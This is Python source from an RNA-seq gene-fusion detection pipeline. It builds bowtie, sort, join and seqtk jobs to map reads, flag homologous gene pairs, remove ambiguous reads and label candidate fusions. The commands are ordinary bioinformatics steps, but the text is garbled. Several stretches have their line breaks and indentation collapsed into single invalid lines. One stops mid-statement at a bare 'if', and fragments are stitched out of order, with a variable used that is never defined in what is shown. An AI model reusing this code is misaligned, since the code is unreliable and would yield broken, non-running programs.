job.add('',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. 
"+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('reads_filtered_unique-mapped-genome.fq'),temp_path=temp_flag) job.clean(outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),temp_path=temp_flag) # job.add('printf',kind='program') # job.add('"Count reads left mapping on transcriptome and genome after filtering out those with better mappings on genome:\n---------------------------------------------------\n "',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='input') # job.add('|',kind='parameter') # job.add("echo $((`wc -l`/4))",kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # group reads which map on transcriptome in one FASTQ file #job.add('concatenate.py',kind='program') if job.iff(empty(outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq')),id="###reads_filtered_not-mapped-genome_mapped-transcriptome.fq###"): job.link( outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'), outdir('reads_filtered_mapped-transcriptome.fq'),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_unique-mapped-genome_mapped-transcriptome.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_mapped-transcriptome.fq'),kind='output') job.run() # job.add('printf',kind='program') # job.add('"Total count reads mapping on transcriptome (mapping on genome and not mapping on genome):\n---------------------------------------------------\n "',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_filtered_mapped-transcriptome.fq'),kind='input') # job.add('|',kind='parameter') # job.add("echo $((`wc -l`/4))",kind='parameter') # job.add('>>',info_file,kind='output') # job.run() ### ### ### if options.trim_3end_keep2 != 0: if job.iff(not empty(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map')),id = "#reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map#"): job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_transcriptome_trim2.txt'),kind='output') job.run() 
job.add('filter_splits.py',kind='program') job.add('-i',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),kind='input',temp_path=temp_flag) job.add('-x',outdir('reads_filtered_transcriptome_trim2.txt'),kind='input',temp_path=temp_flag) job.add('-o',outdir('reads_not-mapped_trim2.map.all.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_not-mapped_trim2.map.all.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('>',outdir('reads_not-mapped_trim2.map.all.sorted.txt'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_not-mapped_trim2.map.all.sorted.txt'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'),kind='output') job.run() else: job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),temp_path=temp_flag) job.clean(outdir('reads_not-mapped_trim2.map.all.txt'),temp_path=temp_flag) job.clean(outdir('reads_not-mapped_trim2.map.all.sorted.txt'),temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),temp_path=temp_flag) job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'),kind='output') job.run() # group reads' mappings on transcriptome in one big MAP file #job.add('concatenate.py',kind='program') job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='input',temp_path=temp_flag) if options.trim_3end_keep2 != 0: job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.final.map'),kind='input',temp_path=temp_flag) # trim2 # job.add('-',kind='parameter') # <== best mappings on transcriptome ####### #job.add('',outdir('reads_filtered_transcriptome.map'),kind='output') # <== best mappings on transcriptome ####### #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if 
    if ( (options.homolog > 0 or (options.ambiguous_filtering)) and job.iff(not empty(outdir('reads_filtered_mapped-transcriptome.fq')),id = "#reads_filtered_mapped-transcriptome.fq#") ):
        ##############################################################################
        # ALL POSSIBLE MAPPINGS of all short reads on transcriptome
        ##############################################################################
        # map against the transcriptome the short reads which do not map on the genome
        # map using the transcript index (not mapped, unique alignment, multiple alignments)
        classic_1 = True

        job.add(_BE_+'bowtie',kind='program')
        job.add('--seed',bowtie_seed,kind='parameter')
        job.add('-t',kind='parameter')
        #job.add('-q',kind='parameter')
        #job.add('-a',kind='parameter')
        job.add('-k','200',kind='parameter')
        #job.add('-v',options.mismatches,kind='parameter')
        job.add('-v', options.ambiguous_mismatches,kind='parameter') # stjude
        ##job.add('--strata',kind='parameter') # stjude ??????
        job.add('-p',options.processes,kind='parameter',checksum='no')
        #job.add('--solexa1.3-quals',kind='parameter')
        job.add('--phred33-quals',kind='parameter')
        #job.add('--best',kind='parameter')
        if classic_1:
            job.add('--suppress','2,4,5,6,7,8',kind='parameter') # original
        else:
            job.add('--suppress','2,4,5,6,7',kind='parameter') # stjude
        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
        if os.path.isfile(datadir('transcripts_index','.1.ebwtl')):
            job.add('--large-index',kind='parameter')
        job.add('',datadir('transcripts_index/'),kind='input')
        job.add('',outdir('reads_filtered_mapped-transcriptome.fq'),kind='input',temp_path = temp_flag)
        #job.add('',outdir('reads_filtered_all-possible-mappings-transcriptome.map'),kind='output') # <== best mappings on transcriptome ####### XXX
        job.add('2>',outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_map.stdout.txt'),kind='output',checksum='no')
        #job.add('2>&1',kind='parameter',checksum='no')
        #job.run() #XXX
        #job.add('|',kind='parameter') # XXX
        # sort the reads' all possible mappings on transcriptome by reads name
        #job.add('LC_ALL=C',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('grep',kind='parameter') # remove the ENST09 and ENST07 transcripts
        job.add('-v',kind='parameter')
        job.add('-F',kind='parameter')
        job.add('-f',datadir('custom_transcripts_mark.txt'),kind='input')
        job.add('|',kind='parameter') # XXX
        if classic_1:
            job.add('LC_ALL=C',kind='parameter')
            job.add('sed',kind='parameter')
            job.add("""'s/\\tEN.*\;EN/\\tEN/'""",kind='parameter')
        else:
            job.add('LC_ALL=C',kind='parameter')
            job.add('awk',kind='parameter')
            job.add("""'{print $1"\\t"substr($2,index($2,";")+1)"\\t"gsub(">","",$3)}'""",kind='parameter')
        # job.add('|',kind='parameter') # XXX
        # job.add('LC_ALL=C',kind='parameter')
        # job.add('uniq',kind='parameter') # XXX
        job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome.map'),kind='output') # <== best mappings on transcriptome ####### XXX
        job.run()
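        # The '-k 200' bowtie pass above deliberately reports up to 200
        # alignments per read instead of only the best one, so that reads
        # hitting several transcripts/genes can be used below to flag
        # homologous/ambiguous gene pairs.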
        job.add('LC_ALL=C',kind='program') # XXX
        if parsort:
            job.add(_PL_+'parsort',kind='parameter')
            job.add('-k','1,1',kind='parameter')
            job.add('-t',"'\\\t'",kind='parameter')
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
            if parsort_buffer_size:
                job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no')
        else:
            job.add('sort',kind='parameter')
            if sort_buffer:
                job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
            if sort_parallel:
                job.add('--parallel',options.processes,kind='parameter',checksum='no')
            if sort_lzop_compress:
                job.add('--compress-program','lzop',kind='parameter',checksum='no')
            elif sort_gzip_compress:
                job.add('--compress-program','gzip',kind='parameter',checksum='no')
            #job.add('-s',kind='parameter') # stable sort
            job.add('-t',"'\t'",kind='parameter')
            job.add('-k','1,1',kind='parameter')
            job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('',outdir('reads_filtered_all-possible-mappings-transcriptome.map'),kind='input',temp_path=temp_flag) # XXX
        #job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_sorted.map'),kind='output')
        #job.run()
        # job.add('|',kind='parameter') # XXX
        # job.add('grep',kind='parameter') # remove the ENSG09 genes
        # job.add('-v',kind='parameter')
        # job.add('-F',kind='parameter')
        # job.add('-f',datadir('custom_genes_mark.txt'),kind='input')
        job.add('|',kind='parameter') # XXX
        job.add('LC_ALL=C',kind='parameter')
        job.add('uniq',kind='parameter') # XXX
        job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_sorted.map'),kind='output')
        job.run() #XXX

        # find the homolog genes using the reads
        job.add(_FC_+'find_homolog_genes.py',kind='program')
        job.add('--input',outdir('reads_filtered_all-possible-mappings-transcriptome_sorted.map'),kind='input',temp_path=temp_flag) # XXX
        #job.add('--input','-',kind='parameter')
        #job.add('--reads',outdir('log_number_of_reads_processed.txt'),kind='parameter',from_file='yes')
        job.add('--input_exons',datadir('exons.txt'),kind='input')
        job.add('--filter',datadir('custom_genes_mark.txt'),kind='input')
        job.add('--processes',options.processes,kind='parameter')
        job.add('--reads','1',kind='parameter')
        if not classic_1:
            job.add('--d1',kind='parameter') # stjude -- only 1 mismatch away
        #job.add('--output_offending_reads',outdir('list_offending_reads.txt'),kind='output')
        # if options.ambiguous_filtering:
        job.add('--output_offending_pair_reads',outdir('list_offending_reads_.txt'),kind='output')
        job.add('--output',outdir('list_candidates_ambiguous_homologous_genes_1.txt'),kind='output',temp_path='no' if options.homolog > 0 else temp_flag) # <== list of genes that might be homologous #######
        job.run()

        # if options.ambiguous_filtering:
        job.add('LC_ALL=C',kind='program')
        job.add('sort',kind='parameter')
        job.add('-u',kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        job.add('',outdir('list_offending_reads_.txt'),kind='input',temp_path=temp_flag)
        # job.add('|',kind='parameter')
        # job.add('LC_ALL=C',kind='parameter')
        # job.add('uniq',kind='parameter')
        job.add('>',outdir('list_offending_reads.txt'),kind='output')
        job.run()
        info(job,
             fromfile = outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_map.stdout.txt'),
             tofile = info_file,
             top = ["All mappings of reads (not mapped on genome + mapped uniquely on genome + mapped on transcriptome) on transcriptome",
                    "-------------------------------------------------------------------------------------------------------------------"],
             bottom = "\n\n\n",
             temp_path = temp_flag
            )

        # get the number of reads mapping on transcriptome and genome
        crgt_ = 0
        if job.run():
            tag = '# reads processed:'
            crgt_ = [line.rstrip('\r\n') for line in file(outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'),'r') if line.lower().find(tag)!=-1]
            crgt_ = float(crgt_.pop(0).split(tag)[1].strip())
            crgt = int(crgt_ * options.homolog)
            file(outdir('log_number_of_reads_processed.txt'),'w').write(str(crgt))

        info(job,
             fromfile = outdir('log_number_of_reads_processed.txt'),
             tofile = info_file,
             top = ["Threshold for pairs of genes to be marked as 'similar_reads' (reference number: %d)" % (int(crgt_),),
                    "-----------------------------------------------------------------------------------------"],
             bottom = "\n\n\n")
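        # Note: crgt above turns the number of reads processed by bowtie into a
        # read-count threshold (a fraction given by options.homolog); gene
        # pairs sharing more reads than this are later labeled 'similar_reads'.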
job.add("""'{print $1"\\t"substr($2,index($2,";")+1)"\\t"gsub(">","",$3)}'""",kind='parameter') job.add('|',kind='parameter') # XXX job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') # XXX #job.add('|',kind='parameter') # XXX job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple.map'),kind='output') # <== best mappings on transcriptome ####### job.run() job.add('LC_ALL=C',kind='program') # XXX if parsort: job.add(_PL_+'parsort',kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-t',"'\\\t'",kind='parameter') job.add('--parallel',options.processes,kind='parameter',checksum='no') if parsort_buffer_size: job.add('--buffer-size',parsort_buffer_size,kind='parameter',checksum='no') else: job.add('sort',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-t',"'\t'",kind='parameter') job.add('-k','1,1',kind='parameter') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple.map'),kind='input',temp_path=temp_flag) # XXX #job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple_sorted.map'),kind='output') # XXX #job.run() # XXX job.add('|',kind='parameter') # XXX job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') # XXX job.add('>',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple_sorted.map'),kind='output') # XXX job.run() #XXX # job.add('grep',kind='parameter') # remove the ENSG09 genes # job.add('-v',kind='parameter') # job.add('-F',kind='parameter') # job.add('-f',datadir('custom_genes_mark.txt'),kind='input') # job.add('|',kind='parameter') # XXX # find the homolog genes using the reads job.add(_FC_+'find_homolog_genes.py',kind='program') job.add('--input',outdir('reads_filtered_all-possible-mappings-transcriptome_multiple_sorted.map'),kind='input',temp_path=temp_flag) #job.add('--input','-',kind='parameter') job.add('--reads','1',kind='parameter') if not classic_2: job.add('--d1',kind='parameter') # stjude -- only 1 mismatch away # using this requires bowtie '--suppress','4,5,6,7' instead of '--suppress','4,5,6,7,8' job.add('--input_exons',datadir('exons.txt'),kind='input') job.add('--filter',datadir('custom_genes_mark.txt'),kind='input') job.add('--processes',options.processes,kind='parameter') job.add('--output',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='output') # <== list of genes that might be homologous ####### job.run() info(job, fromfile = outdir('log_bowtie_reads_filtered_all-possible-mappings-transcriptome_multiple_map.stdout.txt'), tofile = info_file, top = ["Mapping all short reads (which already are mapping multiple times on genome) on transcriptome:", "----------------------------------------------------------------------------------------------"], bottom = "\n\n\n", temp_path = temp_flag) else: # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('>',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='output') job.run() # join the found homolog genes using the reads 
        # join the found homolog genes using the reads
        job.add(_FC_+'join_homolog_genes.py',kind='program')
        job.add('--input_1',outdir('list_candidates_ambiguous_homologous_genes_1.txt'),kind='input',temp_path=temp_flag)
        job.add('--input_2',outdir('list_candidates_ambiguous_homologous_genes_2.txt'),kind='input',temp_path=temp_flag)
        job.add('--reads',outdir('log_number_of_reads_processed.txt'),kind='parameter',from_file='yes')
        job.add('--all',outdir('all_ambiguous_genes.txt'),kind='output')
        job.add('--output',outdir('list_candidates_ambiguous_homologous_genes.txt'),kind='output',temp_path='no' if options.homolog else temp_flag) # <== list of genes that might be homologous #######
        job.run()

        # remove the offending reads from the transcriptome mapping
        job.add('LC_ALL=C',kind='program')
        job.add('join',kind='parameter')
        job.add('-1','1',kind='parameter')
        job.add('-2','1',kind='parameter')
        job.add('-v','2',kind='parameter')
        job.add('-t',"'\t'",kind='parameter')
        job.add('',outdir('list_offending_reads.txt'),kind='input',temp_path=temp_flag)
        job.add('',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input')
        job.add('>',outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),kind='output')
        job.run()

        job.add(_FC_+'find_fusion_genes_map.py',kind='program')
        job.add('--input',outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),kind='input',temp_path=temp_flag)
        job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input')
        job.add('--output_fusion_genes',outdir('candidate_fusion-genes_no-offending-reads.txt'),kind='output')
        job.add('--output_fusion_reads',outdir('candidate_fusion-genes_no-offending-reads_supporting_paired-reads.txt'),kind='output',temp_path=temp_flag)
        job.run()

        # job.add('LC_ALL=C',kind='program')
        # job.add('join',kind='parameter')
        # job.add('-1','1',kind='parameter')
        # job.add('-2','1',kind='parameter')
        # job.add('-t',"'\t'",kind='parameter')
        # job.add('',outdir('list_offending_reads.txt'),kind='input',temp_path=temp_flag)
        # job.add('',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input')
        # job.add('>',outdir('reads_filtered_transcriptome_sorted-read_only-offending-reads.map'),kind='output')
        # job.run()
        # job.add(_FC_+'find_fusion_genes_map.py',kind='program')
        # job.add('--input',outdir('reads_filtered_transcriptome_sorted-read_only-offending-reads.map'),kind='input',temp_path=temp_flag)
        # job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input')
        # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_only-offending-reads.txt'),kind='output')
        # job.add('--output_fusion_reads',outdir('candidate_fusion-genes_only-offending-reads_supporting_paired-reads.txt'),kind='output')
        # job.run()
        # job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),temp_path='no')
        # job.clean(outdir('list_offending_reads.txt'),temp_path=temp_flag)
    else:
        job.link(outdir('reads_filtered_transcriptome_sorted-read.map'), outdir('reads_filtered_transcriptome_sorted-read_no-offending-reads.map'),temp_path='no')

        job.add('touch',kind='program')
        job.add('',outdir('candidate_fusion-genes_no-offending-reads.txt'), kind='output')
        job.run()

        job.add('touch',kind='program')
        job.add('',outdir('list_candidates_ambiguous_homologous_genes.txt'), kind='output')
        job.run()
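    # Note on the offending-read removal in the branch above:
    # 'join -1 1 -2 1 -v 2 A B' prints only the lines of B (the
    # read-name-sorted map) whose first field has no match in A (the
    # offending-read list), i.e. reads hitting at least two different genes
    # are stripped from the mapping before the no-offending fusion calling.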
    ##############################################################################
    # FIND FUSION GENES
    ##############################################################################
    # find ALL fusion genes and transcripts where the offending reads have been removed
    # (offending reads = reads which map at least on two different genes)
    job.add(_FC_+'find_fusion_genes_map.py',kind='program')
    job.add('--input',outdir('reads_filtered_transcriptome_sorted-read.map'),kind='input')
    job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes.txt'),kind='output')
    job.add('--output_fusion_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='output')
    if options.reads_preliminary_fusions:
        job.add('--output_fusion_reads_split',outdir('pre-fusion'),kind='output')
    #job.add('--output_fusion_reads_simple',outdir('candidate_fusion-genes_no-offending-reads_supporting_paired-reads_only-ids.txt'),kind='output')
    job.add('--output_missing_mate_reads',outdir('candidate_fusion-genes_missing_mates.txt'),kind='output')
    job.run()

    if fragments_flag:
        job.add(_FC_+'fragments_fusion_genes.py',kind='program')
        job.add('--fusion-reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input')
        job.add('--minimum',spanning_pairs_minimum,kind='parameter')
        job.add('--fragments',outdir('candidate_fusion-genes_fragments.txt'), kind='output')
        job.run()
    else:
        # job.add('echo',kind='program')
        # job.add('-n','""',kind='parameter')
        # job.add('>',outdir('candidate_fusion-genes_fragments.txt'), kind='output')
        # job.run()
        job.add('touch',kind='program')
        job.add('',outdir('candidate_fusion-genes_fragments.txt'), kind='output')
        job.run()

    if options.reads_preliminary_fusions:
        job.add(_FC_+'concatenate.py',kind='program')
        job.add('-f',outdir('pre-fusion'),kind='input')
        job.add('-',kind='parameter')
        job.add('|',kind='parameter')
        job.add('LC_ALL=C',kind='parameter')
        job.add('sort',kind='parameter')
        job.add('-u',kind='parameter')
        if sort_buffer:
            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
        if sort_parallel:
            job.add('--parallel',options.processes,kind='parameter',checksum='no')
        if sort_lzop_compress:
            job.add('--compress-program','lzop',kind='parameter',checksum='no')
        elif sort_gzip_compress:
            job.add('--compress-program','gzip',kind='parameter',checksum='no')
        job.add('-T',tmp_dir,kind='parameter',checksum='no')
        # job.add('|',kind='parameter')
        # job.add('LC_ALL=C',kind='parameter')
        # job.add('uniq',kind='parameter')
        job.add('>',outdir('pre-fusion_ids.txt'),kind='output')
        job.run()

        job.add(_SK_+'seqtk',kind='program')
        job.add('subseq',kind='parameter')
        job.add('',outdir('originala.fq.gz'),kind='input')
        job.add('',outdir('pre-fusion_ids.txt'),kind='input',temp_path=temp_flag)
        job.add('>',outdir('originala-pre-fusion.fq'),kind='output')
        job.run()

        parts = [el.strip() for el in file(outdir('pre-fusion'),'r').readlines()]
        for par in parts:
            job.add(_SK_+'seqtk',kind='program')
            job.add('subseq',kind='parameter')
            job.add('',outdir('originala-pre-fusion.fq'),kind='input')
            job.add('',par,kind='input',temp_path=temp_flag)
            job.add('>',par+'.fq',kind='output')
            job.run()
        job.clean(outdir('originala-pre-fusion.fq'),temp_path=temp_flag)
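    # What follows is a long cascade of label_fusion_genes.py passes: each pass
    # reads candidate_fusion-genes_NN.txt, attaches one label (from a gene or
    # gene-pair list under the data directory, or from a gene-gene distance
    # rule) to the matching candidates, and writes the next
    # candidate_fusion-genes_NN.txt; the labels are used further down to
    # filter and annotate the candidate fusion genes.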
    # label fusion genes -- banned fusions
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','banned',kind='parameter')
    job.add('--filter_gene_pairs',datadir('banned.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_01.txt'),kind='output')
    job.run()

    # label fusion genes -- known fusions
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_01.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','known',kind='parameter')
    job.add('--filter_gene_pairs',datadir('known.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_02.txt'),kind='output')
    job.run()

    # label fusion genes -- no protein product
    # job.add(_FC_+'label_fusion_genes.py',kind='program')
    # job.add('--input',outdir('candidate_fusion-genes_02.txt'),kind='input',temp_path=temp_flag)
    # job.add('--label','no_protein',kind='parameter')
    # job.add('--similar_gene_symbols',kind='parameter')
    # job.add('--filter_genes',datadir('genes_with_no_proteins.txt'),kind='input')
    # job.add('--output_fusion_genes',outdir('candidate_fusion-genes_02a.txt'),kind='output')
    # job.run()

    # label fusion genes -- paralogs
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_02.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','paralogs',kind='parameter')
    job.add('--filter_gene_pairs',datadir('paralogs.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_02b.txt'),kind='output')
    job.run()

    # label fusion genes -- potential readthrough
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_02b.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','adjacent',kind='parameter')
    job.add('--filter_gene_pairs',datadir('adjacent_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_03.txt'),kind='output')
    job.run()

    # label fusion genes -- fully overlapping in Ensembl
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_03.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ensembl_fully_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ensembl_fully_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_04.txt'),kind='output')
    job.run()

    # label fusion genes -- partially overlapping in Ensembl
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_04.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ensembl_partially_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ensembl_partially_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_05.txt'),kind='output')
    job.run()

    # label fusion genes -- overlapping and on same strand in Ensembl
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_05.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','ensembl_same_strand_overlapping',kind='parameter')
    job.add('--filter_gene_pairs',datadir('ensembl_same_strand_overlapping_genes.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_06.txt'),kind='output')
    job.run()

    # label fusion genes -- similar reads (gene pairs sharing ambiguously mapping reads)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_06.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','similar_reads',kind='parameter')
    job.add('--filter_gene_pairs',outdir('list_candidates_ambiguous_homologous_genes.txt'),kind='input',temp_path=temp_flag)
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_07.txt'),kind='output')
    job.run()
    # label fusion genes -- genes closer to each other than the minimum distance (on the same strand)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_07.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','short_distance',kind='parameter')
    job.add('--min_dist_gene_gene',options.min_dist,kind='parameter')
    job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_08.txt'),kind='output')
    job.run()

    # label fusion genes -- genes closer than 1,000 bp (on the same strand)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_08.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','dist1000bp',kind='parameter')
    job.add('--min_dist_gene_gene','1000',kind='parameter')
    job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_09.txt'),kind='output')
    job.run()

    # label fusion genes -- genes closer than 10,000 bp (on the same strand)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_09.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','dist10kbp',kind='parameter')
    job.add('--min_dist_gene_gene','10000',kind='parameter')
    job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_10.txt'),kind='output')
    job.run()

    # label fusion genes -- genes closer than 100,000 bp (on the same strand)
    job.add(_FC_+'label_fusion_genes.py',kind='program')
    job.add('--input',outdir('candidate_fusion-genes_10.txt'),kind='input',temp_path=temp_flag)
    job.add('--label','dist100kbp',kind='parameter')
    job.add('--min_dist_gene_gene','100000',kind='parameter')
    job.add('--min_dist_gene_gene_database',datadir('exons.txt'),kind='input')
    job.add('--output_fusion_genes',outdir('candidate_fusion-genes_11.txt'),kind='output')
    job.run()

    # label fusion genes -- pseudogenes
